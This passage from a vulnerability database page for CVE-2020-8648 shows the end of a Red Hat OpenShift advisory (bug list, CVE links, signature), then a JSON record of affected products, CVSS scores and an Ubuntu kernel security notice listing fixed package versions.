1923003 - WebConsole Insights widget showing "Issues pending" when the cluster doesn't report anything 1923098 - [vsphere-problem-detector-operator] Need permission to access replicasets.apps resources 1923102 - [vsphere-problem-detector-operator] pod's version is not correct 1923245 - [Assisted-4.7] [Staging][Minimal-ISO] nodes fails to boot 1923674 - k8s 1.20 vendor dependencies 1923721 - PipelineRun running status icon is not rotating 1923753 - Increase initialDelaySeconds for ovs-daemons container in the ovs-node daemonset for upgrade scenarios 1923774 - Docker builds failing for openshift/cluster-resource-override-admission-operator 1923802 - ci/prow/e2e-aws-olm build failing for openshift/cluster-resource-override-admission-operator 1923874 - Unable to specify values with % in kubeletconfig 1923888 - Fixes error metadata gathering 1923892 - Update arch.md after refactor. 1923894 - "installed" operator status in operatorhub page does not reflect the real status of operator 1923895 - Changelog generation. 1923911 - [e2e][automation] Improve tests for vm details page and list filter 1923945 - PVC Name and Namespace resets when user changes os/flavor/workload 1923951 - EventSources showsundefined` in project 1923973 - Dynamic plugin demo README does not contain info how to enable the ConsolePlugins 1924046 - Localhost: Refreshing on a Project removes it from nav item urls 1924078 - Topology quick search View all results footer should be sticky. 1924081 - NTO should ship the latest Tuned daemon release 2.15 1924084 - backend tests incorrectly hard-code artifacts dir 1924128 - [sig-builds][Feature:Builds] verify /run filesystem contents do not have unexpected content using a simple Docker Strategy Build 1924135 - Under sufficient load, CRI-O may segfault 1924143 - Code Editor Decorator url is broken for Bitbucket repos 1924188 - Language selector dropdown doesn't always pre-select the language 1924365 - Add extra disk for VM which use boot source PXE 1924383 - Degraded network operator during upgrade to 4.7.z 1924387 - [ja_JP][zh_CN] Incorrect warning message for deleting namespace on Delete Pod dialog box. 1924480 - non cluster admin can not take VM snapshot: An error occurred, cannot set blockOwnerDeletion if an ownerReference refers to a resource you can't set finalizers on 1924583 - Deprectaed templates are listed in the Templates screen 1924870 - pick upstream pr#96901: plumb context with request deadline 1924955 - Images from Private external registry not working in deploy Image 1924961 - k8sutil.TrimDNS1123Label creates invalid values 1924985 - Build egress-router-cni for both RHEL 7 and 8 1925020 - Console demo plugin deployment image shoult not point to dockerhub 1925024 - Remove extra validations on kafka source form view net section 1925039 - [e2e] Fix Test - ID(CNV-5327) Change Custom Flavor while VM is running 1925072 - NTO needs to ship the current latest stalld v1.7.0 1925163 - Missing info about dev catalog in boot source template column 1925200 - Monitoring Alert icon is missing on the workload in Topology view 1925262 - apiserver getting 2 SIGTERM signals which was immediately making it exit code 1 1925319 - bash syntax error in configure-ovs.sh script 1925408 - Remove StatefulSet gatherer and replace it with gathering corresponding config map data 1925516 - Pipeline Metrics Tooltips are overlapping data 1925562 - Add new ArgoCD link from GitOps application environments page 1925596 - Gitops details page image and commit id text overflows past card boundary 1926556 - 'excessive etcd leader changes' test case failing in serial job because prometheus data is wiped by machine set test 1926588 - The tarball of operator-sdk is not ready for ocp4.7 1927456 - 4.7 still points to 4.6 catalog images 1927500 - API server exits non-zero on 2 SIGTERM signals 1929278 - Monitoring workloads using too high a priorityclass 1929645 - Remove openshift:kubevirt-machine-controllers decleration from machine-api 1929920 - Cluster monitoring documentation link is broken - 404 not found

  1. References:

https://access.redhat.com/security/cve/CVE-2018-10103 https://access.redhat.com/security/cve/CVE-2018-10105 https://access.redhat.com/security/cve/CVE-2018-14461 https://access.redhat.com/security/cve/CVE-2018-14462 https://access.redhat.com/security/cve/CVE-2018-14463 https://access.redhat.com/security/cve/CVE-2018-14464 https://access.redhat.com/security/cve/CVE-2018-14465 https://access.redhat.com/security/cve/CVE-2018-14466 https://access.redhat.com/security/cve/CVE-2018-14467 https://access.redhat.com/security/cve/CVE-2018-14468 https://access.redhat.com/security/cve/CVE-2018-14469 https://access.redhat.com/security/cve/CVE-2018-14470 https://access.redhat.com/security/cve/CVE-2018-14553 https://access.redhat.com/security/cve/CVE-2018-14879 https://access.redhat.com/security/cve/CVE-2018-14880 https://access.redhat.com/security/cve/CVE-2018-14881 https://access.redhat.com/security/cve/CVE-2018-14882 https://access.redhat.com/security/cve/CVE-2018-16227 https://access.redhat.com/security/cve/CVE-2018-16228 https://access.redhat.com/security/cve/CVE-2018-16229 https://access.redhat.com/security/cve/CVE-2018-16230 https://access.redhat.com/security/cve/CVE-2018-16300 https://access.redhat.com/security/cve/CVE-2018-16451 https://access.redhat.com/security/cve/CVE-2018-16452 https://access.redhat.com/security/cve/CVE-2018-20843 https://access.redhat.com/security/cve/CVE-2019-3884 https://access.redhat.com/security/cve/CVE-2019-5018 https://access.redhat.com/security/cve/CVE-2019-6977 https://access.redhat.com/security/cve/CVE-2019-6978 https://access.redhat.com/security/cve/CVE-2019-8625 https://access.redhat.com/security/cve/CVE-2019-8710 https://access.redhat.com/security/cve/CVE-2019-8720 https://access.redhat.com/security/cve/CVE-2019-8743 https://access.redhat.com/security/cve/CVE-2019-8764 https://access.redhat.com/security/cve/CVE-2019-8766 https://access.redhat.com/security/cve/CVE-2019-8769 https://access.redhat.com/security/cve/CVE-2019-8771 https://access.redhat.com/security/cve/CVE-2019-8782 https://access.redhat.com/security/cve/CVE-2019-8783 https://access.redhat.com/security/cve/CVE-2019-8808 https://access.redhat.com/security/cve/CVE-2019-8811 https://access.redhat.com/security/cve/CVE-2019-8812 https://access.redhat.com/security/cve/CVE-2019-8813 https://access.redhat.com/security/cve/CVE-2019-8814 https://access.redhat.com/security/cve/CVE-2019-8815 https://access.redhat.com/security/cve/CVE-2019-8816 https://access.redhat.com/security/cve/CVE-2019-8819 https://access.redhat.com/security/cve/CVE-2019-8820 https://access.redhat.com/security/cve/CVE-2019-8823 https://access.redhat.com/security/cve/CVE-2019-8835 https://access.redhat.com/security/cve/CVE-2019-8844 https://access.redhat.com/security/cve/CVE-2019-8846 https://access.redhat.com/security/cve/CVE-2019-9455 https://access.redhat.com/security/cve/CVE-2019-9458 https://access.redhat.com/security/cve/CVE-2019-11068 https://access.redhat.com/security/cve/CVE-2019-12614 https://access.redhat.com/security/cve/CVE-2019-13050 https://access.redhat.com/security/cve/CVE-2019-13225 https://access.redhat.com/security/cve/CVE-2019-13627 https://access.redhat.com/security/cve/CVE-2019-14889 https://access.redhat.com/security/cve/CVE-2019-15165 https://access.redhat.com/security/cve/CVE-2019-15166 https://access.redhat.com/security/cve/CVE-2019-15903 https://access.redhat.com/security/cve/CVE-2019-15917 https://access.redhat.com/security/cve/CVE-2019-15925 https://access.redhat.com/security/cve/CVE-2019-16167 https://access.redhat.com/security/cve/CVE-2019-16168 https://access.redhat.com/security/cve/CVE-2019-16231 https://access.redhat.com/security/cve/CVE-2019-16233 https://access.redhat.com/security/cve/CVE-2019-16935 https://access.redhat.com/security/cve/CVE-2019-17450 https://access.redhat.com/security/cve/CVE-2019-17546 https://access.redhat.com/security/cve/CVE-2019-18197 https://access.redhat.com/security/cve/CVE-2019-18808 https://access.redhat.com/security/cve/CVE-2019-18809 https://access.redhat.com/security/cve/CVE-2019-19046 https://access.redhat.com/security/cve/CVE-2019-19056 https://access.redhat.com/security/cve/CVE-2019-19062 https://access.redhat.com/security/cve/CVE-2019-19063 https://access.redhat.com/security/cve/CVE-2019-19068 https://access.redhat.com/security/cve/CVE-2019-19072 https://access.redhat.com/security/cve/CVE-2019-19221 https://access.redhat.com/security/cve/CVE-2019-19319 https://access.redhat.com/security/cve/CVE-2019-19332 https://access.redhat.com/security/cve/CVE-2019-19447 https://access.redhat.com/security/cve/CVE-2019-19524 https://access.redhat.com/security/cve/CVE-2019-19533 https://access.redhat.com/security/cve/CVE-2019-19537 https://access.redhat.com/security/cve/CVE-2019-19543 https://access.redhat.com/security/cve/CVE-2019-19602 https://access.redhat.com/security/cve/CVE-2019-19767 https://access.redhat.com/security/cve/CVE-2019-19770 https://access.redhat.com/security/cve/CVE-2019-19906 https://access.redhat.com/security/cve/CVE-2019-19956 https://access.redhat.com/security/cve/CVE-2019-20054 https://access.redhat.com/security/cve/CVE-2019-20218 https://access.redhat.com/security/cve/CVE-2019-20386 https://access.redhat.com/security/cve/CVE-2019-20387 https://access.redhat.com/security/cve/CVE-2019-20388 https://access.redhat.com/security/cve/CVE-2019-20454 https://access.redhat.com/security/cve/CVE-2019-20636 https://access.redhat.com/security/cve/CVE-2019-20807 https://access.redhat.com/security/cve/CVE-2019-20812 https://access.redhat.com/security/cve/CVE-2019-20907 https://access.redhat.com/security/cve/CVE-2019-20916 https://access.redhat.com/security/cve/CVE-2020-0305 https://access.redhat.com/security/cve/CVE-2020-0444 https://access.redhat.com/security/cve/CVE-2020-1716 https://access.redhat.com/security/cve/CVE-2020-1730 https://access.redhat.com/security/cve/CVE-2020-1751 https://access.redhat.com/security/cve/CVE-2020-1752 https://access.redhat.com/security/cve/CVE-2020-1971 https://access.redhat.com/security/cve/CVE-2020-2574 https://access.redhat.com/security/cve/CVE-2020-2752 https://access.redhat.com/security/cve/CVE-2020-2922 https://access.redhat.com/security/cve/CVE-2020-3862 https://access.redhat.com/security/cve/CVE-2020-3864 https://access.redhat.com/security/cve/CVE-2020-3865 https://access.redhat.com/security/cve/CVE-2020-3867 https://access.redhat.com/security/cve/CVE-2020-3868 https://access.redhat.com/security/cve/CVE-2020-3885 https://access.redhat.com/security/cve/CVE-2020-3894 https://access.redhat.com/security/cve/CVE-2020-3895 https://access.redhat.com/security/cve/CVE-2020-3897 https://access.redhat.com/security/cve/CVE-2020-3898 https://access.redhat.com/security/cve/CVE-2020-3899 https://access.redhat.com/security/cve/CVE-2020-3900 https://access.redhat.com/security/cve/CVE-2020-3901 https://access.redhat.com/security/cve/CVE-2020-3902 https://access.redhat.com/security/cve/CVE-2020-6405 https://access.redhat.com/security/cve/CVE-2020-7595 https://access.redhat.com/security/cve/CVE-2020-7774 https://access.redhat.com/security/cve/CVE-2020-8177 https://access.redhat.com/security/cve/CVE-2020-8492 https://access.redhat.com/security/cve/CVE-2020-8563 https://access.redhat.com/security/cve/CVE-2020-8566 https://access.redhat.com/security/cve/CVE-2020-8619 https://access.redhat.com/security/cve/CVE-2020-8622 https://access.redhat.com/security/cve/CVE-2020-8623 https://access.redhat.com/security/cve/CVE-2020-8624 https://access.redhat.com/security/cve/CVE-2020-8647 https://access.redhat.com/security/cve/CVE-2020-8648 https://access.redhat.com/security/cve/CVE-2020-8649 https://access.redhat.com/security/cve/CVE-2020-9327 https://access.redhat.com/security/cve/CVE-2020-9802 https://access.redhat.com/security/cve/CVE-2020-9803 https://access.redhat.com/security/cve/CVE-2020-9805 https://access.redhat.com/security/cve/CVE-2020-9806 https://access.redhat.com/security/cve/CVE-2020-9807 https://access.redhat.com/security/cve/CVE-2020-9843 https://access.redhat.com/security/cve/CVE-2020-9850 https://access.redhat.com/security/cve/CVE-2020-9862 https://access.redhat.com/security/cve/CVE-2020-9893 https://access.redhat.com/security/cve/CVE-2020-9894 https://access.redhat.com/security/cve/CVE-2020-9895 https://access.redhat.com/security/cve/CVE-2020-9915 https://access.redhat.com/security/cve/CVE-2020-9925 https://access.redhat.com/security/cve/CVE-2020-10018 https://access.redhat.com/security/cve/CVE-2020-10029 https://access.redhat.com/security/cve/CVE-2020-10732 https://access.redhat.com/security/cve/CVE-2020-10749 https://access.redhat.com/security/cve/CVE-2020-10751 https://access.redhat.com/security/cve/CVE-2020-10763 https://access.redhat.com/security/cve/CVE-2020-10773 https://access.redhat.com/security/cve/CVE-2020-10774 https://access.redhat.com/security/cve/CVE-2020-10942 https://access.redhat.com/security/cve/CVE-2020-11565 https://access.redhat.com/security/cve/CVE-2020-11668 https://access.redhat.com/security/cve/CVE-2020-11793 https://access.redhat.com/security/cve/CVE-2020-12465 https://access.redhat.com/security/cve/CVE-2020-12655 https://access.redhat.com/security/cve/CVE-2020-12659 https://access.redhat.com/security/cve/CVE-2020-12770 https://access.redhat.com/security/cve/CVE-2020-12826 https://access.redhat.com/security/cve/CVE-2020-13249 https://access.redhat.com/security/cve/CVE-2020-13630 https://access.redhat.com/security/cve/CVE-2020-13631 https://access.redhat.com/security/cve/CVE-2020-13632 https://access.redhat.com/security/cve/CVE-2020-14019 https://access.redhat.com/security/cve/CVE-2020-14040 https://access.redhat.com/security/cve/CVE-2020-14381 https://access.redhat.com/security/cve/CVE-2020-14382 https://access.redhat.com/security/cve/CVE-2020-14391 https://access.redhat.com/security/cve/CVE-2020-14422 https://access.redhat.com/security/cve/CVE-2020-15157 https://access.redhat.com/security/cve/CVE-2020-15503 https://access.redhat.com/security/cve/CVE-2020-15862 https://access.redhat.com/security/cve/CVE-2020-15999 https://access.redhat.com/security/cve/CVE-2020-16166 https://access.redhat.com/security/cve/CVE-2020-24490 https://access.redhat.com/security/cve/CVE-2020-24659 https://access.redhat.com/security/cve/CVE-2020-25211 https://access.redhat.com/security/cve/CVE-2020-25641 https://access.redhat.com/security/cve/CVE-2020-25658 https://access.redhat.com/security/cve/CVE-2020-25661 https://access.redhat.com/security/cve/CVE-2020-25662 https://access.redhat.com/security/cve/CVE-2020-25681 https://access.redhat.com/security/cve/CVE-2020-25682 https://access.redhat.com/security/cve/CVE-2020-25683 https://access.redhat.com/security/cve/CVE-2020-25684 https://access.redhat.com/security/cve/CVE-2020-25685 https://access.redhat.com/security/cve/CVE-2020-25686 https://access.redhat.com/security/cve/CVE-2020-25687 https://access.redhat.com/security/cve/CVE-2020-25694 https://access.redhat.com/security/cve/CVE-2020-25696 https://access.redhat.com/security/cve/CVE-2020-26160 https://access.redhat.com/security/cve/CVE-2020-27813 https://access.redhat.com/security/cve/CVE-2020-27846 https://access.redhat.com/security/cve/CVE-2020-28362 https://access.redhat.com/security/cve/CVE-2020-29652 https://access.redhat.com/security/cve/CVE-2021-2007 https://access.redhat.com/security/cve/CVE-2021-3121 https://access.redhat.com/security/updates/classification/#moderate

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBYDZ+bNzjgjWX9erEAQghXg//awGwjQxJ5LEZWBTdgyuCa8mHEi2rop5T lmebolBMNRSbo9gI8LMSHlvIBBFiV4CuFvfxE0AVLNentfzOTH11TxNWe1KQYt4H EmcGHPeHWTxKDkvAHtVcWXy9WN3y5d4lHSaq6AR1nHRPcj/k1upyx22kotpnYxN8 4d49PjFTO3YbmdYpNLVJ9nY8izqUpTfM7YSyj6ANZSlaYc5Z215o6TPo6e3wobf4 mWu+VfDS0v+/AbGhQhO2sQ7r2ysJ85MB7c62cxck4a51KiA0NKd4xr0TAA4KHnNL ISHFzi5QYXu+meE+9wYRo1ZjJ5fbPj41+1TJbR6O4CbP0xQiFpcUSipNju3rGSGy Ae5G/QGT8J7HzOjlKVvY3SFu/odENR6c+xUIr7IB/FBlu7DdPF2XxMZDQD4DKHEk 4aiDbuiEL3Yf78Ic1RqPPmrj9plIwprVFQz+k3JaQXKD+1dBxO6tk+nVu2/5xNbM uR03hrthYYIpdXLSWU4lzq8j3kQ9wZ4j/m2o6/K6eHNl9PyqAG5jfQv9bVf8E3oG krzc/JLvOfHNEQ/oJs/v/DFDmnAxshCCtGWlpLJ5J0pcD3EePsrPNs1QtQurVrMv RjfBCWKOij53+BinrMKHdsHxfur7GCFCIQCVaLIv6GUjX2NWI0voIVA8JkrFNNp6 McvuEaxco7U= =sw8i -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202002-1243",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "brocade fabric operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "broadcom",
        "version": null
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.1"
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "hci baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "h410c"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.5.2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "active iq unified manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-8648"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.5.2",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire_baseboard_management_controller:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:broadcom:brocade_fabric_operating_system_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:hci_baseboard_management_controller:h410c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-8648"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "157489"
      },
      {
        "db": "PACKETSTORM",
        "id": "157480"
      },
      {
        "db": "PACKETSTORM",
        "id": "157485"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-148"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2020-8648",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 3.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "impactScore": 4.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 3.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "VHN-186773",
            "impactScore": 4.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "PARTIAL",
            "baseScore": 3.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "CVE-2020-8648",
            "impactScore": 4.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "LOW",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.2,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-8648",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202002-148",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-186773",
            "trust": 0.1,
            "value": "LOW"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-8648",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186773"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-8648"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-148"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-8648"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "There is a use-after-free vulnerability in the Linux kernel through 5.5.2 in the n_tty_receive_buf_common function in drivers/tty/n_tty.c. ==========================================================================\nUbuntu Security Notice USN-4345-1\nApril 28, 2020\n\nlinux, linux-aws, linux-aws-hwe, linux-azure, linux-gcp,\nlinux-gke-4.15, linux-hwe, linux-kvm, linux-oem, linux-oracle,\nlinux-raspi2, linux-snapdragon vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 18.04 LTS\n- Ubuntu 16.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. A local attacker could use this to cause a denial of service (system\ncrash) or execute arbitrary code. (CVE-2020-11884)\n\nIt was discovered that the Intel Wi-Fi driver in the Linux kernel did not\nproperly check for errors in some situations. A local attacker could\npossibly use this to cause a denial of service (system crash). \n(CVE-2019-16234)\n\nTristan Madani discovered that the block I/O tracing implementation in the\nLinux kernel contained a race condition. A local attacker could use this to\ncause a denial of service (system crash) or possibly expose sensitive\ninformation. (CVE-2019-19768)\n\nIt was discovered that the vhost net driver in the Linux kernel contained a\nstack buffer overflow. A local attacker with the ability to perform ioctl()\ncalls on /dev/vhost-net could use this to cause a denial of service (system\ncrash). (CVE-2020-10942)\n\nIt was discovered that the OV51x USB Camera device driver in the Linux\nkernel did not properly validate device metadata. A physically proximate\nattacker could use this to cause a denial of service (system crash). \n(CVE-2020-11608)\n\nIt was discovered that the STV06XX USB Camera device driver in the Linux\nkernel did not properly validate device metadata. A physically proximate\nattacker could use this to cause a denial of service (system crash). \n(CVE-2020-11609)\n\nIt was discovered that the Xirlink C-It USB Camera device driver in the\nLinux kernel did not properly validate device metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2020-11668)\n\nIt was discovered that the virtual terminal implementation in the Linux\nkernel contained a race condition. A local attacker could possibly use this\nto cause a denial of service (system crash) or expose sensitive\ninformation. (CVE-2020-8648)\n\nJordy Zomer discovered that the floppy driver in the Linux kernel did not\nproperly check for errors in some situations. A local attacker could\npossibly use this to cause a denial of service (system crash) or possibly\nexpose sensitive information. (CVE-2020-9383)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 18.04 LTS:\n  linux-image-4.15.0-1038-oracle  4.15.0-1038.42\n  linux-image-4.15.0-1058-gke     4.15.0-1058.61\n  linux-image-4.15.0-1059-kvm     4.15.0-1059.60\n  linux-image-4.15.0-1061-raspi2  4.15.0-1061.65\n  linux-image-4.15.0-1066-aws     4.15.0-1066.70\n  linux-image-4.15.0-1077-snapdragon  4.15.0-1077.84\n  linux-image-4.15.0-1080-oem     4.15.0-1080.90\n  linux-image-4.15.0-99-generic   4.15.0-99.100\n  linux-image-4.15.0-99-generic-lpae  4.15.0-99.100\n  linux-image-4.15.0-99-lowlatency  4.15.0-99.100\n  linux-image-aws-lts-18.04       4.15.0.1066.69\n  linux-image-generic             4.15.0.99.89\n  linux-image-generic-lpae        4.15.0.99.89\n  linux-image-gke                 4.15.0.1058.62\n  linux-image-gke-4.15            4.15.0.1058.62\n  linux-image-kvm                 4.15.0.1059.59\n  linux-image-lowlatency          4.15.0.99.89\n  linux-image-oem                 4.15.0.1080.84\n  linux-image-oracle-lts-18.04    4.15.0.1038.47\n  linux-image-powerpc-e500mc      4.15.0.99.89\n  linux-image-powerpc-smp         4.15.0.99.89\n  linux-image-powerpc64-emb       4.15.0.99.89\n  linux-image-powerpc64-smp       4.15.0.99.89\n  linux-image-raspi2              4.15.0.1061.59\n  linux-image-snapdragon          4.15.0.1077.80\n  linux-image-virtual             